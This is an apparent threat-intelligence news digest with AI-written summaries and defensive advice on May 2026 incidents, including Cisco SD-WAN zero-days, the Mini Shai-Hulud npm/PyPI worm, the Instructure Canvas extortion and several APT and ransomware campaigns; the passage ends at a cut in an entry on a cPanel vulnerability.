Enhance supply chain security by validating software integrity, segmenting networks to limit worm propagation, and deploying advanced threat detection for anomalous worm-like behaviors.

Classification

Malware, High Severity, Supply Chain Attack, Worm

Source

Source feed: SecurityWeek | Original source

Cisco Patches Another SD-WAN Zero-Day, the Sixth Exploited in 2026

Eduard Kovacs — Fri, 15 May 2026 06:28:46 GMT

AI Summary

Cisco has patched another zero-day vulnerability (CVE-2026-20182) in its SD-WAN solution, which has been exploited in targeted attacks by the sophisticated threat actor UAT-8616. This marks the sixth such zero-day in Cisco SD-WAN exploited in 2026, indicating persistent and focused adversarial interest in these devices. The vulnerability, if unpatched, can provide initial access to network infrastructure, potentially leading to broader compromise. Organizations using Cisco SD-WAN should treat this as high priority and apply the available patch immediately to mitigate risk.

Why do I care?

Cisco SD-WAN devices often serve as critical network choke points; exploitation can allow attackers to pivot into internal networks and cause major disruption.

What can I do about it?

Apply the security update provided in Cisco's advisory as soon as possible. Additionally, review device logs for any signs of prior exploitation and monitor network traffic for unusual patterns.

Classification

Vulnerability, Critical Severity, Zero-Day Exploit

Source

Source feed: SecurityWeek | Original source

April 2026 CVE Landscape

Fri, 15 May 2026 00:00:00 GMT

AI Summary

In April 2026, Insikt Group identified 37 high-impact vulnerabilities, a 19% increase from March, with 35 rated very critical. 31 were in CISA's KEV catalog. Six CVEs were uncovered via honeypots. Notably, seven vulnerabilities were linked to ransomware, including six exploited by Storm-1175's Medusa ransomware and CVE-2026-41940 associated with Sorry Ransomware. CVE-2024-3721 was used to deliver the Nexcorium botnet. 16 of the 37 vulnerabilities allowed remote code execution, affecting 12 vendors. Public PoCs were available for 24. The fastest exploitation occurred within two days of disclosure. Organizations must prioritize patching these exploited vulnerabilities, especially those tied to ransomware, and monitor for related indicators.

Why do I care?

With 37 actively exploited vulnerabilities, including ransomware-linked exploits and a botnet delivery campaign, organizations face immediate risk of compromise and data encryption.

What can I do about it?

Prioritize patching of these CVEs, especially those in CISA KEV and associated with ransomware groups, and implement detection rules for related IoCs and behaviors.

Classification

Vulnerability, Critical Severity, Botnet, Ransomware

Source

Source feed: Recorded Future | Original source

TeamPCP hackers advertise Mistral AI code repos for sale

Ionut Ilascu — Thu, 14 May 2026 22:50:36 GMT

AI Summary

The TeamPCP hacker group is advertising stolen source code from Mistral AI for sale, threatening to leak the data if no buyer is found. This poses significant risk to Mistral AI's intellectual property and competitive edge, and could expose security vulnerabilities in their AI models. Organizations should strengthen code repository security, monitor for unauthorized access, and have incident response plans for data breaches.

Why do I care?

Leaked source code can lead to intellectual property theft, exposure of security flaws, and reputational damage.

What can I do about it?

Implement strict access controls, monitor repository activity, and deploy data loss prevention tools.

Classification

Incident, High Severity, Data Extortion, Source Code Theft

Source

Source feed: Bleeping Computer | Original source

Congress Puts Heat on Instructure After ShinyHunters Canvas Attacks

Rob Wright — Thu, 14 May 2026 20:19:20 GMT

AI Summary

The US House Committee on Homeland Security has sent a letter to Instructure, the company behind the Canvas learning management system, regarding a cyberattack attributed to the ShinyHunters group. The attack caused significant outages and disruptions for educational institutions relying on Canvas. On the same day, Instructure announced it had reached an 'agreement' with the cybercriminals, likely involving payment to end the extortion. This incident highlights the ongoing threat from ShinyHunters, who have targeted multiple high-profile victims. The congressional scrutiny underscores the seriousness of the breach and its impact on the education sector. Organizations using third-party platforms like Canvas must reassess their cybersecurity posture and vendor risk management. Immediate mitigation includes enhancing monitoring for anomalous activities and ensuring robust data backup and recovery procedures.

Why do I care?

The ShinyHunters group has proven capable of disrupting critical educational platforms, affecting millions of users. This attack demonstrates that no third-party service is immune, and a breach can cascade to your organization's operations and reputation.

What can I do about it?

Enforce multi-factor authentication, segment networks to limit lateral movement, and conduct regular third-party risk assessments. Also, develop and test incident response plans specifically for software supply chain compromises.

Classification

Malware, High Severity, Data Extortion, Ransomware

Source

Source feed: Dark Reading | Original source

'FrostyNeighbor' APT Carefully Targets Govt Orgs in Poland, Ukraine

Elizabeth Montalbano — Thu, 14 May 2026 16:59:25 GMT

AI Summary

The FrostyNeighbor APT group, attributed to Belarus, is conducting a targeted spear-phishing campaign against government entities in Poland and Ukraine. The attackers employ unique victim fingerprinting techniques to tailor their phishing lures before delivering payloads designed for espionage. This campaign highlights the persistent threat from state-sponsored actors and the need for advanced threat detection. Organizations should strengthen email security, deploy multi-factor authentication, and conduct regular security awareness training. Additionally, implementing endpoint detection and response solutions can help identify and mitigate such attacks.

Why do I care?

As a government-targeting APT, FrostyNeighbor poses a serious espionage threat to national security and organizational secrets.

What can I do about it?

Implement advanced email filtering, conduct phishing simulations, and enforce strict access controls to detect and prevent such targeted attacks.

Classification

Incident, High Severity, Espionage, Spear Phishing

Source

Source feed: Dark Reading | Original source

Ongoing exploitation of Cisco Catalyst SD-WAN vulnerabilities

Cisco Talos — Thu, 14 May 2026 16:02:36 GMT

AI Summary

Active exploitation of multiple Cisco Catalyst SD-WAN vulnerabilities is underway. CVE-2026-20182 allows unauthenticated authentication bypass leading to administrative access, exploited by sophisticated actor UAT-8616. Separately, widespread exploitation of CVE-2026-20133, CVE-2026-20128, and CVE-2026-20122 enables remote code execution via chained attacks, with webshells like XenShell and Godzilla deployed for persistence. Impact includes full device compromise, privilege escalation, and network infiltration. Cisco has released patches; immediate upgrade is critical.

Why do I care?

These vulnerabilities allow unauthenticated attackers to gain complete administrative control over critical SD-WAN infrastructure, enabling full network compromise and lateral movement.

What can I do about it?

Apply Cisco security updates immediately, monitor for unauthorized SSH keys and NETCONF changes, and inspect web shells such as XenShell or Godzilla indicators.

Classification

Vulnerability, Critical Severity, Authentication Bypass, Remote Code Execution, Web Shell

Source

Source feed: Cisco Talos Intelligence Group | Original source

Kazuar: Anatomy of a nation-state botnet

Microsoft Threat Intelligence — Thu, 14 May 2026 15:00:00 GMT

AI Summary

Kazuar is a sophisticated modular P2P botnet attributed to Russian state actor Secret Blizzard. It has evolved from a traditional backdoor into a versatile espionage tool targeting government and diplomatic entities in Europe and Central Asia, as well as systems previously compromised by Aqua Blizzard in Ukraine. The botnet uses a three-module architecture (Kernel, Bridge, Worker) to enable persistent covert access. Delivery methods include droppers like Pelmeni. Mitigation involves monitoring for behaviors such as leader election, IPC message routing, and working directory staging. Microsoft Defender provides detections. Organizations should focus on behavioral detection and network segmentation.

Why do I care?

This botnet represents a persistent threat from a nation-state actor targeting high-value sectors, requiring robust defenses.

What can I do about it?

Implement behavioral monitoring for Kazuar's distinct inter-process communication and leader election patterns, and apply network segmentation to limit lateral movement.

Classification

Vulnerability, Critical Severity, Backdoor, Botnet, Espionage

Source

Source feed: Microsoft Security Blog | Original source

Ghostwriter Targets Ukrainian Government With Geofenced PDF Phishing, Cobalt Strike

info@thehackernews.com (The Hacker News) — Thu, 14 May 2026 14:00:37 GMT

AI Summary

Ghostwriter, a Belarus-linked threat actor active since 2016, has launched a new campaign targeting Ukrainian government entities using geofenced PDF phishing lures to deliver Cobalt Strike beacons. The attacks focus on cyber espionage and influence operations, exploiting the ongoing Russia-Ukraine conflict. Organisations should enhance email security and monitor for Cobalt Strike indicators.

Why do I care?

Ghostwriter's targeting of Ukrainian government entities with sophisticated phishing and Cobalt Strike deployment poses a direct threat to national security and could lead to data exfiltration or disruption.

What can I do about it?

Implement advanced email filtering, user awareness training on geofenced phishing, and deploy endpoint detection rules for Cobalt Strike activity, along with network segmentation to limit lateral movement.

Classification

Incident, High Severity, Cyber Espionage, Spear Phishing

Source

Source feed: The Hacker News | Original source

KongTuke hackers now use Microsoft Teams for corporate breaches

Bill Toulas — Thu, 14 May 2026 12:12:40 GMT

AI Summary

Initial access broker KongTuke has adapted its social engineering techniques to exploit Microsoft Teams, enabling rapid compromise of corporate networks in as little as five minutes. By leveraging the trust associated with internal collaboration tools, the group gains persistent access, posing a significant threat to enterprise security. Organizations must enhance user awareness of phishing via Teams, implement multi-factor authentication, and monitor for suspicious meeting invitations to mitigate this evolving risk.

Why do I care?

Attackers can compromise corporate networks in minutes by exploiting trust in Microsoft Teams communications.

What can I do about it?

Implement strong identity verification for meeting invitations, monitor for unusual Teams activity, and enforce conditional access policies.

Classification

Incident, High Severity, Social Engineering, Spear Phishing

Source

Source feed: Bleeping Computer | Original source

Chinese APTs Expand Targets, Update Backdoors in Recent Campaigns

Ionut Arghire — Thu, 14 May 2026 12:11:15 GMT

AI Summary

Chinese APT groups Salt Typhoon and Twill Typhoon have expanded their targeting. Salt Typhoon compromised an energy entity in Azerbaijan, while Twill Typhoon targeted Asian entities with an updated remote access trojan (RAT). These campaigns indicate ongoing espionage and potential disruption. Organizations in the energy sector and Asian region should be vigilant. Mitigation includes monitoring for backdoor activity, updating detection signatures, and enhancing network segmentation.

Why do I care?

These APT campaigns target critical infrastructure and Asian entities, posing risks of data exfiltration and persistent access.

What can I do about it?

Implement network segmentation, monitor for anomalous C2 traffic, and update endpoint detection rules for known backdoor behaviors.

Classification

Malware, High Severity, APT, Remote Access Trojan

Source

Source feed: SecurityWeek | Original source

Kimsuky targets organizations with PebbleDash-based tools

Sojun Ryu — Thu, 14 May 2026 11:00:58 GMT

AI Summary

Kimsuky (APT43) continues to evolve its arsenal, deploying PebbleDash and AppleSeed malware variants in campaigns targeting South Korea, with spillover to Brazil and Germany. The group uses spear-phishing emails and messenger contacts to deliver malicious attachments that drop backdoors and information stealers. New tactics include leveraging legitimate VSCode tunneling for persistence and DWAgent for remote access. The primary impact is data theft from government and defense sectors. Mitigation requires robust email filtering, user awareness training, and monitoring for anomalous use of legitimate tools like VSCode.

Why do I care?

Kimsuky's advanced social engineering and evolving malware pose a persistent threat to government and defense organizations, risking sensitive data exfiltration.

What can I do about it?

Enforce strict email attachment policies, deploy endpoint detection to flag behaviors like VSCode tunneling, and conduct regular phishing simulations to reduce initial access.

Classification

Malware, High Severity, Backdoor, Spear Phishing

Source

Source feed: Kaspersky Securelist | Original source

FrostyNeighbor: Fresh mischief and digital shenanigans

Thu, 14 May 2026 08:50:00 GMT

AI Summary

ESET researchers have identified updated activities from the threat actor FrostyNeighbor, which has refined its compromise chain to support ongoing cyberespionage operations. The group continues to target organizations, likely focusing on data exfiltration and intelligence gathering. Organizations should review their security posture for indicators of compromise associated with FrostyNeighbor and enhance network monitoring to detect lateral movement and data exfiltration. This group's persistence and evolving techniques pose a significant threat to sensitive data across various sectors.

Why do I care?

FrostyNeighbor is actively targeting organizations for cyberespionage, updating its attack methods to evade detection and maintain access for prolonged periods.

What can I do about it?

Implement robust network segmentation, endpoint detection and response solutions, and conduct regular threat hunting for signs of FrostyNeighbor's activities, including unusual outbound data transfers.

Classification

Adversary, High Severity, Cyberespionage

Source

Source feed: ESET WeLiveSecurity | Original source

Iranian hackers targeted major South Korean electronics maker

Bill Toulas — Wed, 13 May 2026 21:59:33 GMT

AI Summary

MuddyWater, an Iran-linked advanced persistent threat group, has launched a broad cyber-espionage campaign targeting at least nine high-profile organizations across multiple sectors and countries, including a major South Korean electronics maker. The campaign aims to steal sensitive data and intellectual property, posing significant risks to affected entities. MuddyWater is known for using spear-phishing emails and custom backdoors to gain initial access and maintain persistence. Organizations are urged to strengthen their email security, implement multi-factor authentication, and monitor for suspicious activities to mitigate the threat.

Why do I care?

This campaign targets high-profile organizations across multiple sectors, leading to potential data breaches and intellectual property theft with severe business and national security impacts.

What can I do about it?

Implement robust spear-phishing defenses, enable multi-factor authentication, monitor for anomalous network connections, and apply timely security patches.

Classification

Incident, High Severity, Cyber Espionage, Targeted Attack

Source

Source feed: Bleeping Computer | Original source

Attackers Weaponize RubyGems for Data Dead Drops

Alexander Culafi — Wed, 13 May 2026 21:09:20 GMT

AI Summary

Threat actors are publishing malicious RubyGems packages that include scrapers targeting public-facing UK government servers. The packages appear to use data dead drops for exfiltration, though the ultimate objective remains unclear. This supply chain attack could compromise the integrity of Ruby-based software development, affecting downstream users who depend on these packages. Organizations, particularly those in the UK government sector, should scrutinize RubyGems dependencies and monitor for unusual network traffic indicative of data exfiltration. Immediate mitigation includes verifying the authenticity of all RubyGems packages and employing runtime security controls to detect scrapers.

Why do I care?

Attackers are leveraging trusted package repositories to target government servers, potentially compromising sensitive data and undermining software supply chain security.

What can I do about it?

Implement strict dependency verification, use private package mirrors, and monitor for suspicious outbound connections from Ruby applications.

Classification

Adversary, High Severity, Malware, Supply Chain Attack

Source

Source feed: Dark Reading | Original source

Tables Turn on 'The Gentlemen' RaaS Gang With Data Leak

Nate Nelson — Wed, 13 May 2026 20:47:46 GMT

AI Summary

An OPSEC failure has led to a data leak from 'The Gentlemen' RaaS gang, revealing key operational details. The group's rise is attributed to a generous affiliate model, opportunistic TTPs, and an effective organizational structure. This incident provides valuable insight into RaaS operations, exposing recruitment strategies and payment models. Understanding these tactics enables defenders to better detect and disrupt similar groups. The leak underscores the persistent threat of ransomware and the importance of proactive measures, including robust backup strategies, employee training, and advanced endpoint protection.

Why do I care?

This OPSEC failure reveals the inner workings of a RaaS group, highlighting the effectiveness of their affiliate model and the need for defenders to scrutinize similar operations.

What can I do about it?

Leverage the leaked information to understand RaaS recruitment and TTPs, and implement robust backup and response strategies to mitigate ransomware impact.

Classification

Malware, High Severity, Ransomware

Source

Source feed: Dark Reading | Original source

Foxconn Confirms North American Factories Hit by Cyberattack

Eduard Kovacs — Wed, 13 May 2026 17:13:36 GMT

AI Summary

Foxconn confirmed a cyberattack on its North American factories, claimed by the Nitrogen ransomware group. The attackers stole 8TB of data, including confidential documents, and extorted the company. The incident highlights risks to critical manufacturing supply chains and sensitive intellectual property. Mitigation should focus on network segmentation, access controls, and proactive threat hunting to defend against ransomware.

Why do I care?

Foxconn is a critical electronics manufacturer; a breach of this scale can disrupt global supply chains and expose sensitive client data, affecting numerous downstream organizations.

What can I do about it?

Implement network segmentation, enforce least-privilege access, regularly back up critical data offline, and conduct tabletop exercises to ensure readiness against ransomware extortion.

Classification

Malware, High Severity, Ransomware

Source

Source feed: SecurityWeek | Original source

When IT Support Calls: Dissecting a ModeloRAT Campaign from Teams to Domain Compromise

Anna Širokova — Wed, 13 May 2026 14:44:02 GMT

AI Summary

In April 2026, Rapid7 investigated an intrusion starting with a fake Microsoft Teams IT Support message, which led to a Python-based ModeloRAT payload delivered via Dropbox. The attacker escalated privileges using CVE-2023-36036, then deployed a fake lock screen to capture domain credentials. With valid credentials, they moved laterally via WinRM and RDP, dumped LSASS memory with DumpIt, and exfiltrated data via anonymous file-sharing services. The campaign highlights the evolving threat of collaboration platform abuse and the rapid shift from endpoint to identity compromise, emphasizing the need for integrated security controls across collaboration, identity, and endpoint domains.

Why do I care?

This attack chain shows how social engineering via a trusted collaboration platform, combined with living-off-the-land techniques and a two-year-old kernel exploit, can achieve domain-wide credential theft and exfiltration in under 48 hours, bypassing many traditional defenses.

What can I do about it?

Restrict external Teams access, patch CVE-2023-36036, monitor for unusual Python/PowerShell execution and WebDAV authentication attempts, and enforce strong identity protection measures such as phishing-resistant MFA and user education on impersonation tactics.

Classification

Vulnerability, High Severity, Credential Theft, Privilege Escalation, Spear Phishing

Source

Source feed: Rapid7 Security Research | Original source

Thus Spoke…The Gentlemen

antoniost@checkpoint.com — Wed, 13 May 2026 13:01:01 GMT

AI Summary

The Gentlemen is a ransomware-as-a-service operation that emerged in mid-2025. By May 2026, it became one of the most active RaaS programs, with approximately 332 victims. An internal database leak exposed operational details including affiliate communications, exploited CVEs (e.g., Fortinet, Cisco), and ransom negotiations (e.g., a $250k demand settled for $190k). The group uses dual extortion, leveraging stolen data from one victim to pressure another. Affiliates deploy SystemBC backdoor for C2. The administrator also participates directly in attacks. The impact includes significant financial losses and data breaches. Mitigation requires patching edge devices and monitoring for SystemBC.

Why do I care?

The Gentlemen is a highly active RaaS operation exploiting known CVEs for initial access and using dual extortion, posing a clear threat to organizations worldwide.

What can I do about it?

Prioritize patching Fortinet and Cisco devices, implement NTLM relay protections, and monitor for SystemBC malware. Maintain offline backups and conduct regular recovery exercises.

Classification

Malware, High Severity, Data Extortion, Ransomware

Source

Source feed: Check Point Research | Original source

China's 'FamousSparrow' APT Nests in South Caucasus Energy Firm

Robert Lemos — Wed, 13 May 2026 13:00:00 GMT

AI Summary

The China-linked APT group FamousSparrow has been observed repeatedly targeting an Azerbaijani oil and gas company, extending its operations beyond traditional sectors like hospitality, telecom, and government. This shift indicates a broadening scope that threatens critical energy infrastructure in the South Caucasus region. The persistent attacks aim at cyber espionage, potentially leading to operational disruption, intellectual property theft, and increased geopolitical tensions. Defenders in the energy sector should prioritize monitoring for FamousSparrow indicators of compromise and adopt robust cybersecurity measures to mitigate this advanced threat.

Why do I care?

As a China-linked APT, FamousSparrow is now targeting the energy sector, which can lead to significant operational disruptions or theft of proprietary data, impacting national security.

What can I do about it?

Monitor for known FamousSparrow TTPs, implement network segmentation, and conduct phishing awareness training to reduce initial access vectors.

Classification

Adversary, High Severity, APT, Cyber Espionage

Source

Source feed: Dark Reading | Original source

Azerbaijani Energy Firm Hit by Repeated Microsoft Exchange Exploitation

info@thehackernews.com (The Hacker News) — Wed, 13 May 2026 13:00:00 GMT

AI Summary

A China-affiliated threat group, identified as FamousSparrow (UAT-9244), executed a multi-wave intrusion against an Azerbaijani energy firm from late December 2025 to February 2026. The campaign leveraged repeated exploitation of Microsoft Exchange vulnerabilities to establish persistent access and expand its operational footprint within the targeted oil and gas organization. This activity highlights the ongoing risk of state-linked adversaries targeting critical infrastructure through widely utilized enterprise mail servers. While specific malware strains were not disclosed, the sustained exploitation underscores the necessity for rigorous patch management and advanced monitoring of Exchange environments. Organizations relying on Microsoft Exchange must prioritize timely vulnerability remediation, enforce strict multi-factor authentication, and implement network segmentation to limit lateral movement. Continuous threat hunting for anomalous Exchange logs and unauthorized mailbox rules is essential to detect and mitigate similar multi-phase intrusions before operational disruption occurs.

Why do I care?

This intrusion demonstrates how persistent exploitation of unpatched Exchange servers enables state-linked actors to gain deep access to critical energy infrastructure.

What can I do about it?

Immediately patch all Exchange deployments, enforce conditional access policies, and monitor for anomalous mailbox rule creation and suspicious external API calls.

Classification

Incident, High Severity, Advanced Persistent Threat, Exploitation

Source

Source feed: The Hacker News | Original source

Foxconn confirms cyberattack claimed by Nitrogen ransomware gang

Sergiu Gatlan — Wed, 13 May 2026 12:49:54 GMT

AI Summary

Foxconn, the world's largest electronics manufacturer, confirmed a ransomware attack on its North American factories, claimed by the Nitrogen ransomware gang. The attack disrupted operations, potentially encrypting critical data and demanding ransom. Foxconn is working to restore normalcy, but the incident highlights the vulnerability of supply chains to ransomware. Immediate impacts include production delays and financial costs. Mitigation involves isolating affected systems, restoring from backups, and enhancing network segmentation and employee phishing awareness. The breach underscores the need for robust incident response plans and cyber resilience.

Why do I care?

Ransomware attacks on major manufacturers like Foxconn can cause significant operational disruptions, financial losses, and supply chain impacts, affecting downstream customers.

What can I do about it?

Implement robust backup and disaster recovery procedures, enforce network segmentation, conduct regular phishing simulations, and maintain up-to-date incident response plans to mitigate ransomware risks.

Classification

Malware, High Severity, Ransomware

Source

Source feed: Bleeping Computer | Original source

Instructure settles with hackers following massive student data theft

Pierluigi Paganini — Wed, 13 May 2026 10:16:15 GMT

AI Summary

Educational tech company Instructure, developer of the Canvas LMS, settled with ShinyHunters after a data breach exposed personal information of millions of students. Attackers exploited a flaw in the Free-for-Teacher environment and stole approximately 3.65TB of data, including names, email addresses, student IDs, and messages. While passwords and financial info were not compromised, the data can be used for targeted phishing. Instructure paid the extortion group to return and destroy the data, and confirmed no further extortion of customers. The U.S. House Committee on Homeland Security is investigating. This incident highlights the risks facing educational institutions and the growing trend of data theft and extortion.

Why do I care?

This breach demonstrates that attackers can leverage stolen user identifiers—even without passwords—to launch convincing phishing campaigns against students, staff, and parents, leading to further compromise.

What can I do about it?

Organizations using Canvas should review access logs for suspicious activity, implement multi-factor authentication, and provide user awareness training focused on phishing. Ensure incident response plans cover extortion attempts and data destruction verification.

Classification

Malware, High Severity, Data Breach, Extortion

Source

Source feed: Security Affairs (Data Breach) | Original source

US govt seeks Instructure testimony on massive Canvas cyberattack

Lawrence Abrams — Tue, 12 May 2026 23:09:55 GMT

AI Summary

The U.S. House Committee on Homeland Security is investigating two cyberattacks by the ShinyHunters extortion group targeting Instructure's Canvas learning platform. The attacks resulted in theft of student data and disruption of school operations during final exams. The committee has called for testimony from Instructure executives to address security failures and prevent future incidents.

Why do I care?

This attack compromised sensitive student data and disrupted educational services, posing legal and reputational risks to institutions.

What can I do about it?

Implement multi-factor authentication, strengthen access controls, and conduct regular security audits for critical platforms.

Classification

Malware, High Severity, Data Breach, Ransomware

Source

Source feed: Bleeping Computer | Original source

Mini Shai-Hulud: Supply Chain Malware Attack

Arctic Wolf — Tue, 12 May 2026 16:49:18 GMT

AI Summary

A coordinated supply chain attack tracked as Mini Shai-Hulud, attributed to the TeamPCP threat actor, compromised dozens of npm and PyPi packages across major projects including TanStack, UiPath, Mistral AI, and guardrails-ai. The attackers used GitHub Actions cache poisoning and token exfiltration techniques to publish malicious versions on May 11–12, 2026. This attack highlights the risk of supply chain compromises in open-source ecosystems, potentially leading to widespread infection and data theft. Immediate mitigation includes verifying package integrity, auditing dependencies, and securing CI/CD pipelines.

Why do I care?

This supply chain attack compromises trusted open-source packages, potentially granting attackers access to sensitive data and systems across multiple organizations.

What can I do about it?

Immediately audit your dependencies for the affected packages, verify integrity using checksums, and review GitHub Actions workflows for cache poisoning vulnerabilities.

Classification

Malware, Critical Severity, Supply Chain Attack

Source

Source feed: Arctic Wolf Labs | Original source

Worm Redux: Fresh Mini Shai-Hulud Infections Bite Supply Chain

Elizabeth Montalbano — Tue, 12 May 2026 11:07:43 GMT

AI Summary

A self-propagating credential-stealing worm named Mini Shai-Hulud, attributed to the threat group TeamPCP, has infected hundreds of npm packages within the open source TanStack ecosystem. This supply chain attack allows the worm to spread widely, compromising credentials of users who install the affected packages. The impact is significant, potentially leading to unauthorized access to sensitive systems and data across multiple organizations. To mitigate, teams should immediately review their npm dependencies for compromised packages, update to secure versions, and monitor for credential theft indicators. Long-term measures include implementing software composition analysis, enforcing strict repository controls, and conducting regular security audits of open source dependencies.

Why do I care?

This worm can infiltrate your software supply chain, potentially compromising sensitive credentials across multiple systems and leading to widespread data breaches.

What can I do about it?

Regularly audit and update all npm dependencies, implement strict repository controls, and monitor for anomalous network activity that may indicate credential theft.

Classification

Malware, High Severity, Credential Theft, Supply Chain Attack, Worm

Source

Source feed: Dark Reading | Original source

TanStack, Mistral AI, UiPath Hit in Fresh Supply Chain Attack

Ionut Arghire — Tue, 12 May 2026 10:10:33 GMT

AI Summary

A fresh supply chain attack dubbed 'Mini Shai-Hulud' has been discovered, with over 400 malicious versions of 170 packages published. The campaign targets open-source ecosystems, hitting prominent organizations including TanStack, Mistral AI, and UiPath. These malicious packages likely serve as initial infection vectors, enabling attackers to execute arbitrary code on compromised systems. The scale and targeted nature of this attack underscore the persistent risk of supply chain compromise. Organizations must review their dependency trees, audit package sources, and implement integrity checks to mitigate similar threats.

Why do I care?

This supply chain attack delivered hundreds of malicious packages to widely used software vendors, directly threatening organizations that integrate these dependencies.

What can I do about it?

Audit your software bill of materials for any of the identified malicious packages, enforce strict package signing and integrity verification, and monitor for unusual behaviors in development environments.

Classification

Adversary, High Severity, Supply Chain Attack

Source

Source feed: SecurityWeek | Original source

Instructure reaches 'agreement' with ShinyHunters to stop data leak

Sergiu Gatlan — Tue, 12 May 2026 09:23:56 GMT

AI Summary

The article reports that Instructure, the developer of the Canvas learning management system, negotiated a settlement with the ShinyHunters extortion group to prevent the public release of compromised institutional data. This incident highlights the escalating threat of cyber extortion targeting educational technology providers, which can lead to widespread data exposure for students, faculty, and affiliated institutions. While specific attack vectors and malware were not disclosed, the situation underscores the critical need for robust data loss prevention and incident response capabilities. Organizations relying on Canvas should verify their security posture, ensure backup integrity, and maintain clear communication channels with vendors regarding breach notifications. Proactive threat hunting and enhanced monitoring of data access patterns are essential to mitigate future extortion risks.

Why do I care?

The compromise of a major edtech provider like Instructure poses significant risk to affiliated institutions, potentially exposing sensitive student and faculty data to public leak or further exploitation.

What can I do about it?

Validate your organization's Canvas security settings, review incident response playbooks for vendor data breaches, and enforce strict data access controls and monitoring to limit potential fallout.

Classification

Incident, High Severity, Cyber Extortion, Data Extortion

Source

Source feed: Bleeping Computer | Original source

Mini Shai-Hulud Worm Compromises TanStack, Mistral AI, Guardrails AI & More Packages

info@thehackernews.com (The Hacker News) — Tue, 12 May 2026 08:50:00 GMT

AI Summary

This article details a supply chain attack by the threat actor TeamPCP, who compromised multiple npm and PyPI packages from TanStack, UiPath, Mistral AI, OpenSearch, and Guardrails AI using a worm named Mini Shai-Hulud. The malicious code, an obfuscated JavaScript file called router_init.js, profiles execution environments, posing a significant risk of data theft or further compromise. Organizations using these packages must immediately assess their exposure and remove any compromised versions to prevent known or potential threats.

Why do I care?

Supply chain attacks like this can lead to widespread compromise across multiple organizations, giving attackers a foothold in trusted software ecosystems.

What can I do about it?

Immediately audit and update any affected packages, verify integrity against official signatures, and implement runtime monitoring for suspicious script behavior.

Classification

Adversary, Critical Severity, Malware, Supply Chain Attack

Source

Source feed: The Hacker News | Original source

Instructure Reaches Ransom Agreement with ShinyHunters to Stop 3.65TB Canvas Leak

info@thehackernews.com (The Hacker News) — Tue, 12 May 2026 07:37:00 GMT

AI Summary

Instructure, the parent company of Canvas, confirmed it reached a ransom agreement with the cybercrime group ShinyHunters after they breached its network and threatened to leak 3.65 TB of stolen data from thousands of schools and universities. The attack highlights the growing threat of extortion-focused ransomware groups targeting educational institutions. The agreement may involve payment to prevent data disclosure, but the full impact on affected organizations remains unclear. This incident underscores the critical need for robust data protection, network segmentation, and incident response plans in the education sector.

Why do I care?

The breach exposed sensitive data from thousands of educational institutions, demonstrating that threat actors specifically target the education sector due to its often limited security resources and high-value data.

What can I do about it?

Implement strong access controls and multi-factor authentication, regularly back up critical data, and conduct security awareness training to prevent initial compromises. Additionally, have an incident response plan that includes extortion negotiation guidelines.

Classification

Malware, High Severity, Data Extortion, Ransomware

Source

Source feed: The Hacker News | Original source

State of ransomware in 2026

Fabio Assolini, Marc Rivero, Maher Yamout, daryagorodilova — Tue, 12 May 2026 07:00:04 GMT

AI Summary

Kaspersky's 2026 ransomware report reveals ongoing evolution despite a decline in affected organizations. Key trends include increased use of EDR killers to bypass defenses, adoption of post-quantum cryptography (e.g., PE32 ransomware using ML-KEM/Kyber1024) making decryption nearly impossible, and a shift toward encryptionless extortion focused on data theft and public disclosure, as exemplified by ShinyHunters. The manufacturing sector alone suffered over $18 billion in losses in Q1-Q3 2025. These developments underscore that ransomware is transitioning from a business continuity issue to a data security and compliance challenge, reducing the effectiveness of backups alone and demanding enhanced defensive measures.

Why do I care?

Ransomware operators are increasingly neutralizing endpoint defenses with EDR killers and shifting to data-theft extortion, bypassing traditional backup protections and exposing sensitive data.

What can I do about it?

Strengthen endpoint detection and response against defense evasion techniques, implement data loss prevention and access controls, and ensure comprehensive incident response plans address both encryption and data exposure scenarios.

Classification

Malware, High Severity, Extortion, Ransomware

Source

Source feed: Kaspersky Securelist | Original source

Mini Shai-Hulud Strikes Again: TanStack + more npm Packages Compromised

Benjamin Read — Tue, 12 May 2026 01:38:56 GMT

AI Summary

The article reports on a renewed supply chain campaign attributed to the threat actor Mini Shai-Hulud, which has compromised legitimate npm packages, notably including TanStack. By injecting malicious code into widely used developer tooling, the group aims to distribute malware or exfiltrate data to downstream developers and organizations. This type of dependency injection attack poses a high risk to software supply chains, potentially enabling widespread initial access, privilege escalation, and persistent backdoors across multiple environments. Immediate mitigation requires auditing npm dependencies for unauthorized commits, verifying package integrity through code signing and dependency pinning, and utilizing supply chain security platforms that detect anomalous package updates. Organizations must enforce strict CI/CD controls and monitor for unusual network egress from build systems to limit potential fallout.

Why do I care?

Npm supply chain compromises directly expose development pipelines and downstream applications to malicious code, enabling widespread initial access and persistent backdoors across your software ecosystem.

What can I do about it?

Audit all npm dependencies for unauthorized updates, enforce dependency pinning and code signing, and deploy supply chain monitoring tools to detect anomalous package behavior during installation.

Classification

Adversary, High Severity, Malicious Dependency Injection, Supply Chain Attack

Source

Source feed: Wiz Security Research | Original source

TeamPCP Compromises Checkmarx Jenkins AST Plugin Weeks After KICS Supply Chain Attack

info@thehackernews.com (The Hacker News) — Mon, 11 May 2026 18:30:00 GMT

AI Summary

TeamPCP compromised the Checkmarx Jenkins AST plugin by publishing a modified version to the Jenkins Marketplace. This supply chain attack follows a similar incident with KICS. Users of the plugin risk unauthorized code execution and potential compromise of their Jenkins environments. Checkmarx has released a safe version (2.0.13-829.vc72453fa_1c16 from December 17, 2025) and urges users to ensure they are running that version or earlier. Immediate action is required to verify plugin integrity and prevent exploitation.

Why do I care?

This supply chain attack directly targets Jenkins environments, potentially allowing attackers to execute malicious code within your CI/CD pipeline, leading to data breaches or further compromise.

What can I do about it?

Verify your Checkmarx Jenkins AST plugin version and update to 2.0.13-829.vc72453fa_1c16 or earlier. Monitor for any suspicious activity and consider implementing integrity checks for all plugins.

Classification

Other, High Severity, Malicious Plugin, Supply Chain Compromise

Source

Source feed: The Hacker News | Original source

cPanel CVE-2026-41940 Under Active Exploitation to Deploy Filemanager Backdoor

info@thehackernews.com (The Hacker News) — Mon, 11 May 2026 17:54:00 GMT

AI Summary

A threat actor named Mr_Rot13 is actively exploiting CVE-2026-41940, a critical authentication bypass vulnerability in cPanel and WebHost Manager (WHM), to deploy a backdoor named Filemanager on compromised servers. This attack allows remote attackers to gain elevated control, posing a significant risk to web hosting environments. Organizations using affected versions should immediately apply patches and monitor for indicators of compromise. The exploitation underscores the importance of timely vulnerability management and proactive threat hunting.

Why do I care?

This active exploitation of a critical cPanel vulnerability allows attackers to bypass authentication and deploy a persistent backdoor, potentially leading to full compromise of web hosting servers and data breaches.

What can I do about it?

